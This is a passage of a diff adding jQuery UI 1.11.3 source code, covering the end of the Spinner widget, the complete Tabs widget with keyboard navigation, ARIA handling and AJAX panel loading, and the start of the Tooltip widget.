+		if ( this.buttons.height() > Math.ceil( uiSpinner.height() * 0.5 ) &&
+				uiSpinner.height() > 0 ) {
+			uiSpinner.height( uiSpinner.height() );
+		}
+
+		// disable spinner if element was already disabled
+		if ( this.options.disabled ) {
+			this.disable();
+		}
+	},
+
+	_keydown: function( event ) {
+		var options = this.options,
+			keyCode = $.ui.keyCode;
+
+		switch ( event.keyCode ) {
+		case keyCode.UP:
+			this._repeat( null, 1, event );
+			return true;
+		case keyCode.DOWN:
+			this._repeat( null, -1, event );
+			return true;
+		case keyCode.PAGE_UP:
+			this._repeat( null, options.page, event );
+			return true;
+		case keyCode.PAGE_DOWN:
+			this._repeat( null, -options.page, event );
+			return true;
+		}
+
+		return false;
+	},
+
+	_uiSpinnerHtml: function() {
+		return "<span class='ui-spinner ui-widget ui-widget-content ui-corner-all'></span>";
+	},
+
+	_buttonHtml: function() {
+		return "" +
+			"<a class='ui-spinner-button ui-spinner-up ui-corner-tr'>" +
+				"<span class='ui-icon " + this.options.icons.up + "'>&#9650;</span>" +
+			"</a>" +
+			"<a class='ui-spinner-button ui-spinner-down ui-corner-br'>" +
+				"<span class='ui-icon " + this.options.icons.down + "'>&#9660;</span>" +
+			"</a>";
+	},
+
+	_start: function( event ) {
+		if ( !this.spinning && this._trigger( "start", event ) === false ) {
+			return false;
+		}
+
+		if ( !this.counter ) {
+			this.counter = 1;
+		}
+		this.spinning = true;
+		return true;
+	},
+
+	_repeat: function( i, steps, event ) {
+		i = i || 500;
+
+		clearTimeout( this.timer );
+		this.timer = this._delay(function() {
+			this._repeat( 40, steps, event );
+		}, i );
+
+		this._spin( steps * this.options.step, event );
+	},
+
+	_spin: function( step, event ) {
+		var value = this.value() || 0;
+
+		if ( !this.counter ) {
+			this.counter = 1;
+		}
+
+		value = this._adjustValue( value + step * this._increment( this.counter ) );
+
+		if ( !this.spinning || this._trigger( "spin", event, { value: value } ) !== false) {
+			this._value( value );
+			this.counter++;
+		}
+	},
+
+	_increment: function( i ) {
+		var incremental = this.options.incremental;
+
+		if ( incremental ) {
+			return $.isFunction( incremental ) ?
+				incremental( i ) :
+				Math.floor( i * i * i / 50000 - i * i / 500 + 17 * i / 200 + 1 );
+		}
+
+		return 1;
+	},
+
+	_precision: function() {
+		var precision = this._precisionOf( this.options.step );
+		if ( this.options.min !== null ) {
+			precision = Math.max( precision, this._precisionOf( this.options.min ) );
+		}
+		return precision;
+	},
+
+	_precisionOf: function( num ) {
+		var str = num.toString(),
+			decimal = str.indexOf( "." );
+		return decimal === -1 ? 0 : str.length - decimal - 1;
+	},
+
+	_adjustValue: function( value ) {
+		var base, aboveMin,
+			options = this.options;
+
+		// make sure we're at a valid step
+		// - find out where we are relative to the base (min or 0)
+		base = options.min !== null ? options.min : 0;
+		aboveMin = value - base;
+		// - round to the nearest step
+		aboveMin = Math.round(aboveMin / options.step) * options.step;
+		// - rounding is based on 0, so adjust back to our base
+		value = base + aboveMin;
+
+		// fix precision from bad JS floating point math
+		value = parseFloat( value.toFixed( this._precision() ) );
+
+		// clamp the value
+		if ( options.max !== null && value > options.max) {
+			return options.max;
+		}
+		if ( options.min !== null && value < options.min ) {
+			return options.min;
+		}
+
+		return value;
+	},
+
+	_stop: function( event ) {
+		if ( !this.spinning ) {
+			return;
+		}
+
+		clearTimeout( this.timer );
+		clearTimeout( this.mousewheelTimer );
+		this.counter = 0;
+		this.spinning = false;
+		this._trigger( "stop", event );
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "culture" || key === "numberFormat" ) {
+			var prevValue = this._parse( this.element.val() );
+			this.options[ key ] = value;
+			this.element.val( this._format( prevValue ) );
+			return;
+		}
+
+		if ( key === "max" || key === "min" || key === "step" ) {
+			if ( typeof value === "string" ) {
+				value = this._parse( value );
+			}
+		}
+		if ( key === "icons" ) {
+			this.buttons.first().find( ".ui-icon" )
+				.removeClass( this.options.icons.up )
+				.addClass( value.up );
+			this.buttons.last().find( ".ui-icon" )
+				.removeClass( this.options.icons.down )
+				.addClass( value.down );
+		}
+
+		this._super( key, value );
+
+		if ( key === "disabled" ) {
+			this.widget().toggleClass( "ui-state-disabled", !!value );
+			this.element.prop( "disabled", !!value );
+			this.buttons.button( value ? "disable" : "enable" );
+		}
+	},
+
+	_setOptions: spinner_modifier(function( options ) {
+		this._super( options );
+	}),
+
+	_parse: function( val ) {
+		if ( typeof val === "string" && val !== "" ) {
+			val = window.Globalize && this.options.numberFormat ?
+				Globalize.parseFloat( val, 10, this.options.culture ) : +val;
+		}
+		return val === "" || isNaN( val ) ? null : val;
+	},
+
+	_format: function( value ) {
+		if ( value === "" ) {
+			return "";
+		}
+		return window.Globalize && this.options.numberFormat ?
+			Globalize.format( value, this.options.numberFormat, this.options.culture ) :
+			value;
+	},
+
+	_refresh: function() {
+		this.element.attr({
+			"aria-valuemin": this.options.min,
+			"aria-valuemax": this.options.max,
+			// TODO: what should we do with values that can't be parsed?
+			"aria-valuenow": this._parse( this.element.val() )
+		});
+	},
+
+	isValid: function() {
+		var value = this.value();
+
+		// null is invalid
+		if ( value === null ) {
+			return false;
+		}
+
+		// if value gets adjusted, it's invalid
+		return value === this._adjustValue( value );
+	},
+
+	// update the value without triggering change
+	_value: function( value, allowAny ) {
+		var parsed;
+		if ( value !== "" ) {
+			parsed = this._parse( value );
+			if ( parsed !== null ) {
+				if ( !allowAny ) {
+					parsed = this._adjustValue( parsed );
+				}
+				value = this._format( parsed );
+			}
+		}
+		this.element.val( value );
+		this._refresh();
+	},
+
+	_destroy: function() {
+		this.element
+			.removeClass( "ui-spinner-input" )
+			.prop( "disabled", false )
+			.removeAttr( "autocomplete" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-valuemin" )
+			.removeAttr( "aria-valuemax" )
+			.removeAttr( "aria-valuenow" );
+		this.uiSpinner.replaceWith( this.element );
+	},
+
+	stepUp: spinner_modifier(function( steps ) {
+		this._stepUp( steps );
+	}),
+	_stepUp: function( steps ) {
+		if ( this._start() ) {
+			this._spin( (steps || 1) * this.options.step );
+			this._stop();
+		}
+	},
+
+	stepDown: spinner_modifier(function( steps ) {
+		this._stepDown( steps );
+	}),
+	_stepDown: function( steps ) {
+		if ( this._start() ) {
+			this._spin( (steps || 1) * -this.options.step );
+			this._stop();
+		}
+	},
+
+	pageUp: spinner_modifier(function( pages ) {
+		this._stepUp( (pages || 1) * this.options.page );
+	}),
+
+	pageDown: spinner_modifier(function( pages ) {
+		this._stepDown( (pages || 1) * this.options.page );
+	}),
+
+	value: function( newVal ) {
+		if ( !arguments.length ) {
+			return this._parse( this.element.val() );
+		}
+		spinner_modifier( this._value ).call( this, newVal );
+	},
+
+	widget: function() {
+		return this.uiSpinner;
+	}
+});
+
+
+/*!
+ * jQuery UI Tabs 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/tabs/
+ */
+
+
+var tabs = $.widget( "ui.tabs", {
+	version: "1.11.3",
+	delay: 300,
+	options: {
+		active: null,
+		collapsible: false,
+		event: "click",
+		heightStyle: "content",
+		hide: null,
+		show: null,
+
+		// callbacks
+		activate: null,
+		beforeActivate: null,
+		beforeLoad: null,
+		load: null
+	},
+
+	_isLocal: (function() {
+		var rhash = /#.*$/;
+
+		return function( anchor ) {
+			var anchorUrl, locationUrl;
+
+			// support: IE7
+			// IE7 doesn't normalize the href property when set via script (#9317)
+			anchor = anchor.cloneNode( false );
+
+			anchorUrl = anchor.href.replace( rhash, "" );
+			locationUrl = location.href.replace( rhash, "" );
+
+			// decoding may throw an error if the URL isn't UTF-8 (#9518)
+			try {
+				anchorUrl = decodeURIComponent( anchorUrl );
+			} catch ( error ) {}
+			try {
+				locationUrl = decodeURIComponent( locationUrl );
+			} catch ( error ) {}
+
+			return anchor.hash.length > 1 && anchorUrl === locationUrl;
+		};
+	})(),
+
+	_create: function() {
+		var that = this,
+			options = this.options;
+
+		this.running = false;
+
+		this.element
+			.addClass( "ui-tabs ui-widget ui-widget-content ui-corner-all" )
+			.toggleClass( "ui-tabs-collapsible", options.collapsible );
+
+		this._processTabs();
+		options.active = this._initialActive();
+
+		// Take disabling tabs via class attribute from HTML
+		// into account and update option properly.
+		if ( $.isArray( options.disabled ) ) {
+			options.disabled = $.unique( options.disabled.concat(
+				$.map( this.tabs.filter( ".ui-state-disabled" ), function( li ) {
+					return that.tabs.index( li );
+				})
+			) ).sort();
+		}
+
+		// check for length avoids error when initializing empty list
+		if ( this.options.active !== false && this.anchors.length ) {
+			this.active = this._findActive( options.active );
+		} else {
+			this.active = $();
+		}
+
+		this._refresh();
+
+		if ( this.active.length ) {
+			this.load( options.active );
+		}
+	},
+
+	_initialActive: function() {
+		var active = this.options.active,
+			collapsible = this.options.collapsible,
+			locationHash = location.hash.substring( 1 );
+
+		if ( active === null ) {
+			// check the fragment identifier in the URL
+			if ( locationHash ) {
+				this.tabs.each(function( i, tab ) {
+					if ( $( tab ).attr( "aria-controls" ) === locationHash ) {
+						active = i;
+						return false;
+					}
+				});
+			}
+
+			// check for a tab marked active via a class
+			if ( active === null ) {
+				active = this.tabs.index( this.tabs.filter( ".ui-tabs-active" ) );
+			}
+
+			// no active tab, set to false
+			if ( active === null || active === -1 ) {
+				active = this.tabs.length ? 0 : false;
+			}
+		}
+
+		// handle numbers: negative, out of range
+		if ( active !== false ) {
+			active = this.tabs.index( this.tabs.eq( active ) );
+			if ( active === -1 ) {
+				active = collapsible ? false : 0;
+			}
+		}
+
+		// don't allow collapsible: false and active: false
+		if ( !collapsible && active === false && this.anchors.length ) {
+			active = 0;
+		}
+
+		return active;
+	},
+
+	_getCreateEventData: function() {
+		return {
+			tab: this.active,
+			panel: !this.active.length ? $() : this._getPanelForTab( this.active )
+		};
+	},
+
+	_tabKeydown: function( event ) {
+		var focusedTab = $( this.document[0].activeElement ).closest( "li" ),
+			selectedIndex = this.tabs.index( focusedTab ),
+			goingForward = true;
+
+		if ( this._handlePageNav( event ) ) {
+			return;
+		}
+
+		switch ( event.keyCode ) {
+			case $.ui.keyCode.RIGHT:
+			case $.ui.keyCode.DOWN:
+				selectedIndex++;
+				break;
+			case $.ui.keyCode.UP:
+			case $.ui.keyCode.LEFT:
+				goingForward = false;
+				selectedIndex--;
+				break;
+			case $.ui.keyCode.END:
+				selectedIndex = this.anchors.length - 1;
+				break;
+			case $.ui.keyCode.HOME:
+				selectedIndex = 0;
+				break;
+			case $.ui.keyCode.SPACE:
+				// Activate only, no collapsing
+				event.preventDefault();
+				clearTimeout( this.activating );
+				this._activate( selectedIndex );
+				return;
+			case $.ui.keyCode.ENTER:
+				// Toggle (cancel delayed activation, allow collapsing)
+				event.preventDefault();
+				clearTimeout( this.activating );
+				// Determine if we should collapse or activate
+				this._activate( selectedIndex === this.options.active ? false : selectedIndex );
+				return;
+			default:
+				return;
+		}
+
+		// Focus the appropriate tab, based on which key was pressed
+		event.preventDefault();
+		clearTimeout( this.activating );
+		selectedIndex = this._focusNextTab( selectedIndex, goingForward );
+
+		// Navigating with control/command key will prevent automatic activation
+		if ( !event.ctrlKey && !event.metaKey ) {
+
+			// Update aria-selected immediately so that AT think the tab is already selected.
+			// Otherwise AT may confuse the user by stating that they need to activate the tab,
+			// but the tab will already be activated by the time the announcement finishes.
+			focusedTab.attr( "aria-selected", "false" );
+			this.tabs.eq( selectedIndex ).attr( "aria-selected", "true" );
+
+			this.activating = this._delay(function() {
+				this.option( "active", selectedIndex );
+			}, this.delay );
+		}
+	},
+
+	_panelKeydown: function( event ) {
+		if ( this._handlePageNav( event ) ) {
+			return;
+		}
+
+		// Ctrl+up moves focus to the current tab
+		if ( event.ctrlKey && event.keyCode === $.ui.keyCode.UP ) {
+			event.preventDefault();
+			this.active.focus();
+		}
+	},
+
+	// Alt+page up/down moves focus to the previous/next tab (and activates)
+	_handlePageNav: function( event ) {
+		if ( event.altKey && event.keyCode === $.ui.keyCode.PAGE_UP ) {
+			this._activate( this._focusNextTab( this.options.active - 1, false ) );
+			return true;
+		}
+		if ( event.altKey && event.keyCode === $.ui.keyCode.PAGE_DOWN ) {
+			this._activate( this._focusNextTab( this.options.active + 1, true ) );
+			return true;
+		}
+	},
+
+	_findNextTab: function( index, goingForward ) {
+		var lastTabIndex = this.tabs.length - 1;
+
+		function constrain() {
+			if ( index > lastTabIndex ) {
+				index = 0;
+			}
+			if ( index < 0 ) {
+				index = lastTabIndex;
+			}
+			return index;
+		}
+
+		while ( $.inArray( constrain(), this.options.disabled ) !== -1 ) {
+			index = goingForward ? index + 1 : index - 1;
+		}
+
+		return index;
+	},
+
+	_focusNextTab: function( index, goingForward ) {
+		index = this._findNextTab( index, goingForward );
+		this.tabs.eq( index ).focus();
+		return index;
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "active" ) {
+			// _activate() will handle invalid values and update this.options
+			this._activate( value );
+			return;
+		}
+
+		if ( key === "disabled" ) {
+			// don't use the widget factory's disabled handling
+			this._setupDisabled( value );
+			return;
+		}
+
+		this._super( key, value);
+
+		if ( key === "collapsible" ) {
+			this.element.toggleClass( "ui-tabs-collapsible", value );
+			// Setting collapsible: false while collapsed; open first panel
+			if ( !value && this.options.active === false ) {
+				this._activate( 0 );
+			}
+		}
+
+		if ( key === "event" ) {
+			this._setupEvents( value );
+		}
+
+		if ( key === "heightStyle" ) {
+			this._setupHeightStyle( value );
+		}
+	},
+
+	_sanitizeSelector: function( hash ) {
+		return hash ? hash.replace( /[!"$%&'()*+,.\/:;<=>?@\[\]\^`{|}~]/g, "\\$&" ) : "";
+	},
+
+	refresh: function() {
+		var options = this.options,
+			lis = this.tablist.children( ":has(a[href])" );
+
+		// get disabled tabs from class attribute from HTML
+		// this will get converted to a boolean if needed in _refresh()
+		options.disabled = $.map( lis.filter( ".ui-state-disabled" ), function( tab ) {
+			return lis.index( tab );
+		});
+
+		this._processTabs();
+
+		// was collapsed or no tabs
+		if ( options.active === false || !this.anchors.length ) {
+			options.active = false;
+			this.active = $();
+		// was active, but active tab is gone
+		} else if ( this.active.length && !$.contains( this.tablist[ 0 ], this.active[ 0 ] ) ) {
+			// all remaining tabs are disabled
+			if ( this.tabs.length === options.disabled.length ) {
+				options.active = false;
+				this.active = $();
+			// activate previous tab
+			} else {
+				this._activate( this._findNextTab( Math.max( 0, options.active - 1 ), false ) );
+			}
+		// was active, active tab still exists
+		} else {
+			// make sure active index is correct
+			options.active = this.tabs.index( this.active );
+		}
+
+		this._refresh();
+	},
+
+	_refresh: function() {
+		this._setupDisabled( this.options.disabled );
+		this._setupEvents( this.options.event );
+		this._setupHeightStyle( this.options.heightStyle );
+
+		this.tabs.not( this.active ).attr({
+			"aria-selected": "false",
+			"aria-expanded": "false",
+			tabIndex: -1
+		});
+		this.panels.not( this._getPanelForTab( this.active ) )
+			.hide()
+			.attr({
+				"aria-hidden": "true"
+			});
+
+		// Make sure one tab is in the tab order
+		if ( !this.active.length ) {
+			this.tabs.eq( 0 ).attr( "tabIndex", 0 );
+		} else {
+			this.active
+				.addClass( "ui-tabs-active ui-state-active" )
+				.attr({
+					"aria-selected": "true",
+					"aria-expanded": "true",
+					tabIndex: 0
+				});
+			this._getPanelForTab( this.active )
+				.show()
+				.attr({
+					"aria-hidden": "false"
+				});
+		}
+	},
+
+	_processTabs: function() {
+		var that = this,
+			prevTabs = this.tabs,
+			prevAnchors = this.anchors,
+			prevPanels = this.panels;
+
+		this.tablist = this._getList()
+			.addClass( "ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all" )
+			.attr( "role", "tablist" )
+
+			// Prevent users from focusing disabled tabs via click
+			.delegate( "> li", "mousedown" + this.eventNamespace, function( event ) {
+				if ( $( this ).is( ".ui-state-disabled" ) ) {
+					event.preventDefault();
+				}
+			})
+
+			// support: IE <9
+			// Preventing the default action in mousedown doesn't prevent IE
+			// from focusing the element, so if the anchor gets focused, blur.
+			// We don't have to worry about focusing the previously focused
+			// element since clicking on a non-focusable element should focus
+			// the body anyway.
+			.delegate( ".ui-tabs-anchor", "focus" + this.eventNamespace, function() {
+				if ( $( this ).closest( "li" ).is( ".ui-state-disabled" ) ) {
+					this.blur();
+				}
+			});
+
+		this.tabs = this.tablist.find( "> li:has(a[href])" )
+			.addClass( "ui-state-default ui-corner-top" )
+			.attr({
+				role: "tab",
+				tabIndex: -1
+			});
+
+		this.anchors = this.tabs.map(function() {
+				return $( "a", this )[ 0 ];
+			})
+			.addClass( "ui-tabs-anchor" )
+			.attr({
+				role: "presentation",
+				tabIndex: -1
+			});
+
+		this.panels = $();
+
+		this.anchors.each(function( i, anchor ) {
+			var selector, panel, panelId,
+				anchorId = $( anchor ).uniqueId().attr( "id" ),
+				tab = $( anchor ).closest( "li" ),
+				originalAriaControls = tab.attr( "aria-controls" );
+
+			// inline tab
+			if ( that._isLocal( anchor ) ) {
+				selector = anchor.hash;
+				panelId = selector.substring( 1 );
+				panel = that.element.find( that._sanitizeSelector( selector ) );
+			// remote tab
+			} else {
+				// If the tab doesn't already have aria-controls,
+				// generate an id by using a throw-away element
+				panelId = tab.attr( "aria-controls" ) || $( {} ).uniqueId()[ 0 ].id;
+				selector = "#" + panelId;
+				panel = that.element.find( selector );
+				if ( !panel.length ) {
+					panel = that._createPanel( panelId );
+					panel.insertAfter( that.panels[ i - 1 ] || that.tablist );
+				}
+				panel.attr( "aria-live", "polite" );
+			}
+
+			if ( panel.length) {
+				that.panels = that.panels.add( panel );
+			}
+			if ( originalAriaControls ) {
+				tab.data( "ui-tabs-aria-controls", originalAriaControls );
+			}
+			tab.attr({
+				"aria-controls": panelId,
+				"aria-labelledby": anchorId
+			});
+			panel.attr( "aria-labelledby", anchorId );
+		});
+
+		this.panels
+			.addClass( "ui-tabs-panel ui-widget-content ui-corner-bottom" )
+			.attr( "role", "tabpanel" );
+
+		// Avoid memory leaks (#10056)
+		if ( prevTabs ) {
+			this._off( prevTabs.not( this.tabs ) );
+			this._off( prevAnchors.not( this.anchors ) );
+			this._off( prevPanels.not( this.panels ) );
+		}
+	},
+
+	// allow overriding how to find the list for rare usage scenarios (#7715)
+	_getList: function() {
+		return this.tablist || this.element.find( "ol,ul" ).eq( 0 );
+	},
+
+	_createPanel: function( id ) {
+		return $( "<div>" )
+			.attr( "id", id )
+			.addClass( "ui-tabs-panel ui-widget-content ui-corner-bottom" )
+			.data( "ui-tabs-destroy", true );
+	},
+
+	_setupDisabled: function( disabled ) {
+		if ( $.isArray( disabled ) ) {
+			if ( !disabled.length ) {
+				disabled = false;
+			} else if ( disabled.length === this.anchors.length ) {
+				disabled = true;
+			}
+		}
+
+		// disable tabs
+		for ( var i = 0, li; ( li = this.tabs[ i ] ); i++ ) {
+			if ( disabled === true || $.inArray( i, disabled ) !== -1 ) {
+				$( li )
+					.addClass( "ui-state-disabled" )
+					.attr( "aria-disabled", "true" );
+			} else {
+				$( li )
+					.removeClass( "ui-state-disabled" )
+					.removeAttr( "aria-disabled" );
+			}
+		}
+
+		this.options.disabled = disabled;
+	},
+
+	_setupEvents: function( event ) {
+		var events = {};
+		if ( event ) {
+			$.each( event.split(" "), function( index, eventName ) {
+				events[ eventName ] = "_eventHandler";
+			});
+		}
+
+		this._off( this.anchors.add( this.tabs ).add( this.panels ) );
+		// Always prevent the default action, even when disabled
+		this._on( true, this.anchors, {
+			click: function( event ) {
+				event.preventDefault();
+			}
+		});
+		this._on( this.anchors, events );
+		this._on( this.tabs, { keydown: "_tabKeydown" } );
+		this._on( this.panels, { keydown: "_panelKeydown" } );
+
+		this._focusable( this.tabs );
+		this._hoverable( this.tabs );
+	},
+
+	_setupHeightStyle: function( heightStyle ) {
+		var maxHeight,
+			parent = this.element.parent();
+
+		if ( heightStyle === "fill" ) {
+			maxHeight = parent.height();
+			maxHeight -= this.element.outerHeight() - this.element.height();
+
+			this.element.siblings( ":visible" ).each(function() {
+				var elem = $( this ),
+					position = elem.css( "position" );
+
+				if ( position === "absolute" || position === "fixed" ) {
+					return;
+				}
+				maxHeight -= elem.outerHeight( true );
+			});
+
+			this.element.children().not( this.panels ).each(function() {
+				maxHeight -= $( this ).outerHeight( true );
+			});
+
+			this.panels.each(function() {
+				$( this ).height( Math.max( 0, maxHeight -
+					$( this ).innerHeight() + $( this ).height() ) );
+			})
+			.css( "overflow", "auto" );
+		} else if ( heightStyle === "auto" ) {
+			maxHeight = 0;
+			this.panels.each(function() {
+				maxHeight = Math.max( maxHeight, $( this ).height( "" ).height() );
+			}).height( maxHeight );
+		}
+	},
+
+	_eventHandler: function( event ) {
+		var options = this.options,
+			active = this.active,
+			anchor = $( event.currentTarget ),
+			tab = anchor.closest( "li" ),
+			clickedIsActive = tab[ 0 ] === active[ 0 ],
+			collapsing = clickedIsActive && options.collapsible,
+			toShow = collapsing ? $() : this._getPanelForTab( tab ),
+			toHide = !active.length ? $() : this._getPanelForTab( active ),
+			eventData = {
+				oldTab: active,
+				oldPanel: toHide,
+				newTab: collapsing ? $() : tab,
+				newPanel: toShow
+			};
+
+		event.preventDefault();
+
+		if ( tab.hasClass( "ui-state-disabled" ) ||
+				// tab is already loading
+				tab.hasClass( "ui-tabs-loading" ) ||
+				// can't switch durning an animation
+				this.running ||
+				// click on active header, but not collapsible
+				( clickedIsActive && !options.collapsible ) ||
+				// allow canceling activation
+				( this._trigger( "beforeActivate", event, eventData ) === false ) ) {
+			return;
+		}
+
+		options.active = collapsing ? false : this.tabs.index( tab );
+
+		this.active = clickedIsActive ? $() : tab;
+		if ( this.xhr ) {
+			this.xhr.abort();
+		}
+
+		if ( !toHide.length && !toShow.length ) {
+			$.error( "jQuery UI Tabs: Mismatching fragment identifier." );
+		}
+
+		if ( toShow.length ) {
+			this.load( this.tabs.index( tab ), event );
+		}
+		this._toggle( event, eventData );
+	},
+
+	// handles show/hide for selecting tabs
+	_toggle: function( event, eventData ) {
+		var that = this,
+			toShow = eventData.newPanel,
+			toHide = eventData.oldPanel;
+
+		this.running = true;
+
+		function complete() {
+			that.running = false;
+			that._trigger( "activate", event, eventData );
+		}
+
+		function show() {
+			eventData.newTab.closest( "li" ).addClass( "ui-tabs-active ui-state-active" );
+
+			if ( toShow.length && that.options.show ) {
+				that._show( toShow, that.options.show, complete );
+			} else {
+				toShow.show();
+				complete();
+			}
+		}
+
+		// start out by hiding, then showing, then completing
+		if ( toHide.length && this.options.hide ) {
+			this._hide( toHide, this.options.hide, function() {
+				eventData.oldTab.closest( "li" ).removeClass( "ui-tabs-active ui-state-active" );
+				show();
+			});
+		} else {
+			eventData.oldTab.closest( "li" ).removeClass( "ui-tabs-active ui-state-active" );
+			toHide.hide();
+			show();
+		}
+
+		toHide.attr( "aria-hidden", "true" );
+		eventData.oldTab.attr({
+			"aria-selected": "false",
+			"aria-expanded": "false"
+		});
+		// If we're switching tabs, remove the old tab from the tab order.
+		// If we're opening from collapsed state, remove the previous tab from the tab order.
+		// If we're collapsing, then keep the collapsing tab in the tab order.
+		if ( toShow.length && toHide.length ) {
+			eventData.oldTab.attr( "tabIndex", -1 );
+		} else if ( toShow.length ) {
+			this.tabs.filter(function() {
+				return $( this ).attr( "tabIndex" ) === 0;
+			})
+			.attr( "tabIndex", -1 );
+		}
+
+		toShow.attr( "aria-hidden", "false" );
+		eventData.newTab.attr({
+			"aria-selected": "true",
+			"aria-expanded": "true",
+			tabIndex: 0
+		});
+	},
+
+	_activate: function( index ) {
+		var anchor,
+			active = this._findActive( index );
+
+		// trying to activate the already active panel
+		if ( active[ 0 ] === this.active[ 0 ] ) {
+			return;
+		}
+
+		// trying to collapse, simulate a click on the current active header
+		if ( !active.length ) {
+			active = this.active;
+		}
+
+		anchor = active.find( ".ui-tabs-anchor" )[ 0 ];
+		this._eventHandler({
+			target: anchor,
+			currentTarget: anchor,
+			preventDefault: $.noop
+		});
+	},
+
+	_findActive: function( index ) {
+		return index === false ? $() : this.tabs.eq( index );
+	},
+
+	_getIndex: function( index ) {
+		// meta-function to give users option to provide a href string instead of a numerical index.
+		if ( typeof index === "string" ) {
+			index = this.anchors.index( this.anchors.filter( "[href$='" + index + "']" ) );
+		}
+
+		return index;
+	},
+
+	_destroy: function() {
+		if ( this.xhr ) {
+			this.xhr.abort();
+		}
+
+		this.element.removeClass( "ui-tabs ui-widget ui-widget-content ui-corner-all ui-tabs-collapsible" );
+
+		this.tablist
+			.removeClass( "ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all" )
+			.removeAttr( "role" );
+
+		this.anchors
+			.removeClass( "ui-tabs-anchor" )
+			.removeAttr( "role" )
+			.removeAttr( "tabIndex" )
+			.removeUniqueId();
+
+		this.tablist.unbind( this.eventNamespace );
+
+		this.tabs.add( this.panels ).each(function() {
+			if ( $.data( this, "ui-tabs-destroy" ) ) {
+				$( this ).remove();
+			} else {
+				$( this )
+					.removeClass( "ui-state-default ui-state-active ui-state-disabled " +
+						"ui-corner-top ui-corner-bottom ui-widget-content ui-tabs-active ui-tabs-panel" )
+					.removeAttr( "tabIndex" )
+					.removeAttr( "aria-live" )
+					.removeAttr( "aria-busy" )
+					.removeAttr( "aria-selected" )
+					.removeAttr( "aria-labelledby" )
+					.removeAttr( "aria-hidden" )
+					.removeAttr( "aria-expanded" )
+					.removeAttr( "role" );
+			}
+		});
+
+		this.tabs.each(function() {
+			var li = $( this ),
+				prev = li.data( "ui-tabs-aria-controls" );
+			if ( prev ) {
+				li
+					.attr( "aria-controls", prev )
+					.removeData( "ui-tabs-aria-controls" );
+			} else {
+				li.removeAttr( "aria-controls" );
+			}
+		});
+
+		this.panels.show();
+
+		if ( this.options.heightStyle !== "content" ) {
+			this.panels.css( "height", "" );
+		}
+	},
+
+	enable: function( index ) {
+		var disabled = this.options.disabled;
+		if ( disabled === false ) {
+			return;
+		}
+
+		if ( index === undefined ) {
+			disabled = false;
+		} else {
+			index = this._getIndex( index );
+			if ( $.isArray( disabled ) ) {
+				disabled = $.map( disabled, function( num ) {
+					return num !== index ? num : null;
+				});
+			} else {
+				disabled = $.map( this.tabs, function( li, num ) {
+					return num !== index ? num : null;
+				});
+			}
+		}
+		this._setupDisabled( disabled );
+	},
+
+	disable: function( index ) {
+		var disabled = this.options.disabled;
+		if ( disabled === true ) {
+			return;
+		}
+
+		if ( index === undefined ) {
+			disabled = true;
+		} else {
+			index = this._getIndex( index );
+			if ( $.inArray( index, disabled ) !== -1 ) {
+				return;
+			}
+			if ( $.isArray( disabled ) ) {
+				disabled = $.merge( [ index ], disabled ).sort();
+			} else {
+				disabled = [ index ];
+			}
+		}
+		this._setupDisabled( disabled );
+	},
+
+	load: function( index, event ) {
+		index = this._getIndex( index );
+		var that = this,
+			tab = this.tabs.eq( index ),
+			anchor = tab.find( ".ui-tabs-anchor" ),
+			panel = this._getPanelForTab( tab ),
+			eventData = {
+				tab: tab,
+				panel: panel
+			};
+
+		// not remote
+		if ( this._isLocal( anchor[ 0 ] ) ) {
+			return;
+		}
+
+		this.xhr = $.ajax( this._ajaxSettings( anchor, event, eventData ) );
+
+		// support: jQuery <1.8
+		// jQuery <1.8 returns false if the request is canceled in beforeSend,
+		// but as of 1.8, $.ajax() always returns a jqXHR object.
+		if ( this.xhr && this.xhr.statusText !== "canceled" ) {
+			tab.addClass( "ui-tabs-loading" );
+			panel.attr( "aria-busy", "true" );
+
+			this.xhr
+				.success(function( response ) {
+					// support: jQuery <1.8
+					// http://bugs.jquery.com/ticket/11778
+					setTimeout(function() {
+						panel.html( response );
+						that._trigger( "load", event, eventData );
+					}, 1 );
+				})
+				.complete(function( jqXHR, status ) {
+					// support: jQuery <1.8
+					// http://bugs.jquery.com/ticket/11778
+					setTimeout(function() {
+						if ( status === "abort" ) {
+							that.panels.stop( false, true );
+						}
+
+						tab.removeClass( "ui-tabs-loading" );
+						panel.removeAttr( "aria-busy" );
+
+						if ( jqXHR === that.xhr ) {
+							delete that.xhr;
+						}
+					}, 1 );
+				});
+		}
+	},
+
+	_ajaxSettings: function( anchor, event, eventData ) {
+		var that = this;
+		return {
+			url: anchor.attr( "href" ),
+			beforeSend: function( jqXHR, settings ) {
+				return that._trigger( "beforeLoad", event,
+					$.extend( { jqXHR: jqXHR, ajaxSettings: settings }, eventData ) );
+			}
+		};
+	},
+
+	_getPanelForTab: function( tab ) {
+		var id = $( tab ).attr( "aria-controls" );
+		return this.element.find( this._sanitizeSelector( "#" + id ) );
+	}
+});
+
+
+/*!
+ * jQuery UI Tooltip 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/tooltip/
+ */
+
+
+var tooltip = $.widget( "ui.tooltip", {
+	version: "1.11.3",
+	options: {
+		content: function() {
+			// support: IE<9, Opera in jQuery <1.7
+			// .text() can't accept undefined, so coerce to a string
+			var title = $( this ).attr( "title" ) || "";
+			// Escape title, since we're going from an attribute to raw HTML
+			return $( "<a>" ).text( title ).html();
+		},
+		hide: true,
+		// Disabled elements have inconsistent behavior across browsers (#8661)
+		items: "[title]:not([disabled])",
+		position: {
+			my: "left top+15",
+			at: "left bottom",
+			collision: "flipfit flip"
+		},
+		show: true,
+		tooltipClass: null,
+		track: false,
+
+		// callbacks
+		close: null,
+		open: null
+	},
+
+	_addDescribedBy: function( elem, id ) {
+		var describedby = (elem.attr( "aria-describedby" ) || "").split( /\s+/ );
+		describedby.push( id );
+		elem
+			.data( "ui-tooltip-id", id )
+			.attr( "aria-describedby", $.trim( describedby.join( " " ) ) );
+	},
+
+	_removeDescribedBy: function( elem ) {
+		var id = elem.data( "ui-tooltip-id" ),
+			describedby = (elem.attr( "aria-describedby" ) || "").split( /\s+/ ),
